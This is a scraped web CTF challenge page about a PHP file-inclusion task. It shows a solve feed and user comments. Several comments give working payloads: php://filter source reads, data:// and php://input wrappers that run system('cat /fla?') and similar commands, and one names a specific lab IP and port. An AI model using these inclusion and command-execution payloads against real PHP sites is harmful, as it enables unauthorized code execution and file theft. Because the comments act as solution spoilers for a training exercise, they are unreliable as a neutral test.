简单的IncludeWEB 未解决
分数:
15
金币:
2
题目作者:
hanzkj
一 血:
flagOrz
一血奖励:
2金币
解 决:
313
提 示:
描 述:
听说你很会读文件?我把门(目录遍历)焊死了,窗户(关键词过滤)也封了。笔给你,你来写(payload)。
评分(0)
暂无评分
解题动态
shuangyqqh 攻破了该题 16小时前
wuyong5025 攻破了该题 1天前
fenglian88 攻破了该题 1天前
cacssac 攻破了该题 2天前
JINY123 攻破了该题 2天前
simho 攻破了该题 3天前
dacming9527 攻破了该题 3天前
刚哥glory 攻破了该题 4天前
docker_01 攻破了该题 5天前
Tgentimc 攻破了该题 6天前
ccttffwwyy 攻破了该题 6天前
x_xisr 攻破了该题 7天前
追风 攻破了该题 8天前
1234555 攻破了该题 9天前
zhengjim 攻破了该题 12天前
zyf3178745665 攻破了该题 13天前
18303480451 攻破了该题 15天前
houguan 攻破了该题 15天前
whileangel 攻破了该题 17天前
评论
kitniu 2月前
举报
1.IP/?page=php://filter/read=convert.base64-encode/resource=index.php 2.IP/?page=data://text/plain,%3C?php%20system(%27cat%20/fla?%27)?%3E
网恋秀牛子被录屏导致自卑 5月前
举报
/?page=data://text/plain,<?=exec("cat /fla?")?>
shrinp 6月前
举报
php://filter/convert.base64-encode/resource获取源码-》查看WAF细节-》使用data://text/plain, <?php 你需要的命令?>即可
yinghui130 6月前
举报
POST /?page=php://input HTTP/1.1 &lt;br&gt; Host: 171.80.2.169:15133 &lt;br&gt; &lt;br&gt; &lt;?php system('tac /flag ');?&gt;
网恋秀牛子被录屏导致自卑 5月前
举报
@111222 这不是实体编码,是bugku不让发尖括号之类的符号,自动把评论替换成实体编码了
111222 6月前
举报
谢谢你的思路,不过我用burp试了一下这里不用实体编码似乎也可以过
Jazz888 7月前
举报
flag{**********}
wywitkey 7月前
举报
解题思路是伪协议,先期php://filter/读源码,后期data://text/plain,读flag